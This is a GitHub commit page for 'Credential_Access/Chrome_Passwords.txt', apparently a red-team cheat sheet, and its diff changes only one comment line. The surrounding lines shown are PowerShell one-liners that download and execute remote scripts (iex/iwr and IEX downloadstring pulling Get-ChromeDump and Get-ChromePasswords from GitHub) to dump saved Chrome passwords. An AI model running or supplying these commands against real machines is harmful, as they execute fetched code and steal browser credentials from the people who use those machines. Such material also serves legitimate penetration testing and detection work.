Skip to content

Commit

Permalink
Update Chrome_Passwords.txt
Browse files Browse the repository at this point in the history
  • Loading branch information
BankSecurity authored Oct 14, 2019
1 parent 569d759 commit 1796967
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion Credential_Access/Chrome_Passwords.txt
Original file line number Diff line number Diff line change
Expand Up @@ -7,7 +7,7 @@ powershell.exe wget https://github.com/tresacton/PasswordStealer/raw/master/Chro
###########################################################
powershell "iex(iwr https://raw.githubusercontent.com/adaptivethreat/Empire/master/data/module_source/collection/Get-ChromeDump.ps1);get-chromedump"

###########################################################
################## CHORME must be closed ##############################
IEX((new-object net.webclient).downloadstring("https://raw.githubusercontent.com/et0x/Get-ChromePasswords/master/Get-ChromePasswords.ps1"))
OR
powershell.exe "IEX((new-object net.webclient).downloadstring('https://raw.githubusercontent.com/et0x/GetChromePasswords/master/Get-ChromePasswords.ps1'))"
Expand Down

0 comments on commit 1796967

Please sign in to comment.